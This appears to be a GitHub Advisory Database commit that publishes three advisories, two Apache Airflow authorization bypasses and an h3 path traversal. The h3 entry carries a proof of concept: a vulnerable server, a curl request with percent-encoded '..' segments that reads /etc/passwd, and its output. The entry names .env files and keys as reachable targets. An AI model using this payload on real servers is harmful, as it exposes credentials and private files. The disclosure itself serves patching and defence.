Publish Advisories

GHSA-4m3h-wp5w-5hqh
GHSA-wr4h-v87w-p3r7
GHSA-x3fv-96qh-67m7

Author: advisory-database[bot]

…-4m3h-wp5w-5hqh/GHSA-4m3h-wp5w-5hqh.json …-4m3h-wp5w-5hqh/GHSA-4m3h-wp5w-5hqh.jsonadvisories/unreviewed/2026/03/GHSA-4m3h-wp5w-5hqh/GHSA-4m3h-wp5w-5hqh.json renamed to advisories/github-reviewed/2026/03/GHSA-4m3h-wp5w-5hqh/GHSA-4m3h-wp5w-5hqh.json advisories/unreviewed/2026/03/GHSA-4m3h-wp5w-5hqh/GHSA-4m3h-wp5w-5hqh.json renamed to advisories/github-reviewed/2026/03/GHSA-4m3h-wp5w-5hqh/GHSA-4m3h-wp5w-5hqh.json

@@ -1,19 +1,40 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-4m3h-wp5w-5hqh",
-  "modified": "2026-03-17T18:30:32Z",
+  "modified": "2026-03-18T16:19:16Z",
   "published": "2026-03-17T12:30:19Z",
   "aliases": [
     "CVE-2026-26929"
   ],
+  "summary": "Apache Airflow: Wildcard DagVersion Listing Bypasses Per‑DAG RBAC and Leaks Metadata",
   "details": "Apache Airflow versions 3.0.0 through 3.1.7 FastAPI DagVersion listing API does not apply per-DAG authorization filtering when the request is made with dag_id set to \"~\" (wildcard for all DAGs). As a result, version metadata of DAGs that the requester is not authorized to access is returned.\n\n\nUsers are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "apache-airflow"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "3.0.0"
+            },
+            {
+              "fixed": "3.1.8"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
@@ -23,6 +44,10 @@
       "type": "WEB",
       "url": "https://github.com/apache/airflow/pull/61675"
     },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/apache/airflow"
+    },
     {
       "type": "WEB",
       "url": "https://lists.apache.org/thread/g5o6khx83jwqvdyn0mlyb0krt35cs9ss"
@@ -37,8 +62,8 @@
       "CWE-732"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-18T16:19:16Z",
     "nvd_published_at": "2026-03-17T11:16:11Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-wr4h-v87w-p3r7/GHSA-wr4h-v87w-p3r7.json

@@ -0,0 +1,86 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-wr4h-v87w-p3r7",
+  "modified": "2026-03-18T16:18:32Z",
+  "published": "2026-03-18T16:18:32Z",
+  "aliases": [],
+  "summary": "h3 has a Path Traversal via Percent-Encoded Dot Segments in serveStatic Allows Arbitrary File Read",
+  "details": "## Summary\n\n`serveStatic()` in h3 is vulnerable to path traversal via percent-encoded dot segments (`%2e%2e`), allowing an unauthenticated attacker to read arbitrary files outside the intended static directory on Node.js deployments.\n\n## Details\n\nThe vulnerability exists in `src/utils/static.ts` at [line 86](https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/static.ts#L86):\n\n```typescript\nconst originalId = decodeURI(withLeadingSlash(withoutTrailingSlash(event.url.pathname)));\n```\n\nOn Node.js, h3 uses srvx's `FastURL` class to parse request URLs. Unlike the standard WHATWG `URL` parser, `FastURL` extracts the pathname via raw string slicing for performance — it does **not** normalize dot segments (`.` / `..`) or resolve percent-encoded equivalents (`%2e`).\n\nThis means a request to `/%2e%2e/` will have `event.url.pathname` return `/%2e%2e/` verbatim, whereas the standard `URL` parser would normalize it to `/` (resolving `..` upward).\n\nThe `serveStatic()` function then calls `decodeURI()` on this raw pathname, which decodes `%2e` to `.`, producing `/../`. The resulting path containing `../` traversal sequences is passed directly to the user-provided `getMeta()` and `getContents()` callbacks with no sanitization or traversal validation.\n\nWhen these callbacks perform filesystem operations (the intended and documented usage), the `../` sequences resolve against the filesystem, escaping the static root directory.\n\n\nBefore exploit:\n\n<img width=\"761\" height=\"97\" alt=\"image\" src=\"https://github.com/user-attachments/assets/798f9d3d-f76c-4c29-aca3-5a6ccd3b3627\" />\n\n### Vulnerability chain\n\n```\n1. Attacker sends:    GET /%2e%2e/%2e%2e/%2e%2e/etc/passwd\n2. FastURL.pathname:  /%2e%2e/%2e%2e/%2e%2e/etc/passwd  (raw, no normalization)\n3. decodeURI():       /../../../etc/passwd                (%2e decoded to .)\n4. getMeta(id):       id = \"/../../../etc/passwd\"         (no traversal check)\n5. path.join(root,id): /etc/passwd                        (.. resolved by OS)\n6. Response:          contents of /etc/passwd\n```\n\n## PoC\n\n### Vulnerable server (`server.ts`)\n\n```typescript\nimport { H3, serveStatic } from \"h3\";\nimport { serve } from \"h3/node\";\nimport { readFileSync, statSync } from \"node:fs\";\nimport { join, resolve } from \"node:path\";\n\nconst STATIC_ROOT = resolve(\"./public\");\nconst app = new H3();\n\napp.all(\"/**\", (event) =>\n  serveStatic(event, {\n    getMeta: (id) => {\n      const filePath = join(STATIC_ROOT, id);\n      try {\n        const stat = statSync(filePath);\n        return { size: stat.size, mtime: stat.mtime };\n      } catch {\n        return undefined;\n      }\n    },\n    getContents: (id) => {\n      const filePath = join(STATIC_ROOT, id);\n      try {\n        return readFileSync(filePath);\n      } catch {\n        return undefined;\n      }\n    },\n  })\n);\n\nserve({ fetch: app.fetch });\n```\n\n### Exploit\n\n```bash\n# Read /etc/passwd (adjust number of %2e%2e segments based on static root depth)\ncurl -s --path-as-is \"http://localhost:3000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\"\n```\n\n### Result\n\n```\nroot:x:0:0:root:/root:/usr/bin/zsh\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n...\n```\n\n\nProof:\n\n<img width=\"940\" height=\"703\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f452e061-847a-424c-9dda-dfbf899687b1\" />\n\nPwned by **0xkakashi** \n\n<img width=\"942\" height=\"74\" alt=\"image\" src=\"https://github.com/user-attachments/assets/db881519-1456-4e4c-a751-d8781b7abe95\" />\n\n\n## Impact\n\nAn unauthenticated remote attacker can read arbitrary files from the server's filesystem by sending a crafted HTTP request with `%2e%2e` (percent-encoded `..`) path segments to any endpoint served by `serveStatic()`.\n\nThis affects any h3 v2.x application using `serveStatic()` running on Node.js (where the `FastURL` fast path is used). Applications running on runtimes that provide a pre-parsed `URL` object (e.g., Cloudflare Workers, Deno) may not be affected, as `FastURL`'s raw string slicing is bypassed.\n\n**Exploitable files include but are not limited to:**\n- `/etc/passwd`, `/etc/shadow` (if readable)\n- Application source code and configuration files\n- `.env` files containing secrets, API keys, database credentials\n- Private keys and certificates",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "h3"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "2.0.0"
+            },
+            {
+              "fixed": "2.0.1-rc.15"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 2.0.1-rc.14"
+      }
+    },
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "h3"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.15.6"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/h3js/h3/security/advisories/GHSA-wr4h-v87w-p3r7"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/h3js/h3/commit/0e751b4059060f2ade01a0bdfd96b0f5ffc8a26d"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/h3js/h3"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/static.ts#L86"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-116",
+      "CWE-22"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-18T16:18:32Z",
+    "nvd_published_at": null
+  }
+}

…-x3fv-96qh-67m7/GHSA-x3fv-96qh-67m7.json …-x3fv-96qh-67m7/GHSA-x3fv-96qh-67m7.jsonadvisories/unreviewed/2026/03/GHSA-x3fv-96qh-67m7/GHSA-x3fv-96qh-67m7.json renamed to advisories/github-reviewed/2026/03/GHSA-x3fv-96qh-67m7/GHSA-x3fv-96qh-67m7.json advisories/unreviewed/2026/03/GHSA-x3fv-96qh-67m7/GHSA-x3fv-96qh-67m7.json renamed to advisories/github-reviewed/2026/03/GHSA-x3fv-96qh-67m7/GHSA-x3fv-96qh-67m7.json

@@ -1,19 +1,40 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-x3fv-96qh-67m7",
-  "modified": "2026-03-17T18:30:32Z",
+  "modified": "2026-03-18T16:19:30Z",
   "published": "2026-03-17T12:30:20Z",
   "aliases": [
     "CVE-2026-28563"
   ],
+  "summary": "Apache Airflow: DAG authorization bypass",
   "details": "Apache Airflow versions 3.1.0 through 3.1.7 /ui/dependencies endpoint returns the full DAG dependency graph without filtering by authorized DAG IDs. This allows an authenticated user with only DAG Dependencies permission to enumerate DAGs they are not authorized to view.\n\n\nUsers are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "apache-airflow"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "3.0.0"
+            },
+            {
+              "fixed": "3.1.8"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
@@ -23,6 +44,10 @@
       "type": "WEB",
       "url": "https://github.com/apache/airflow/pull/62046"
     },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/apache/airflow"
+    },
     {
       "type": "WEB",
       "url": "https://lists.apache.org/thread/dwzf62qg9z8wvfsjknpfd8bvtwghd49s"
@@ -37,8 +62,8 @@
       "CWE-732"
     ],
     "severity": "MODERATE",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-18T16:19:30Z",
     "nvd_published_at": "2026-03-17T11:16:11Z"
   }
 }